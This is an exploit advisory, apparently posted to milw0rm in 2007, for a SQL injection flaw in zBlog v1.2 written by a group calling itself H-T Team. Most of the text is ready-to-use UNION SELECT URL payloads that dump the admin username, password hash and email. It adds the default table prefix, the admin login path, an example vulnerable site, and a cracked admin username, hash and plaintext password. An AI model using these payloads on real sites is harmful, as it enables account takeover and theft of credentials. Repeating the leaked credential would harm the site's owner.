######################################################################### zBlog v1.2 Remote SQL Injection Exploit ######################################################################### ## AUTHOR : H-T Team ( HouSSamix _ ToXiC350 _ CoNaN ) ## HOME : http://no-hack.net ## Script : zBlog ## Version : 1.2 ## Site : http://kaxz01.free.fr/ ## Download : http://kaxz01.free.fr/fichiers/zBlog.zip ## EXPLOITS : [1] http://server.com/Path/index.php?page=categ&categ=-1%20union%20select%201,pseudo_admin,motdepasse_admin,4,5,6,7,8,9,10,11,12,13,14,15,16,email_admin%20from%20[table prefix]_admins-- [2] http://server.com/Path/index.php?page=articles&article=-1%20union%20select%201,pseudo_admin,3,motdepasse_admin,5,6,7,8,9,10,11,12,13,14,15,16,17,email_admin%20from%20[table prefix]_admins-- [table prefix] = by default it is zblog ex : http://Site.com/zBlog/index.php?page=articles&article=-1%20union%20select%201,pseudo_admin,3,motdepasse_admin,5,6,7,8,9,10,11,12,13,14,15,16,17,email_admin%20from%20zblog_admins-- ## Note admin login is at /admin/ ## GREETZ : RoMaNcYxHaCkEr , Mahmood_Ali , C_m and all musulmans hackers ######################################################################### zBlog v1.2 Remote SQL Injection Exploit ######################################################################### exemple of site vulnerable http://www.xxx.org/zblog/index.php?page=categ&categ=-1%20union%20select%201,pseudo_admin,motdepasse_admin,4,5,6,7,8,9,10,11,12,13,14,15,16,email_admin%20from%20zblog_admins-- account admin with password md5 cracked user >> Selim pass >> 6a81060b83b919bc115112bf840eca63 = miles # milw0rm.com [2007-12-22]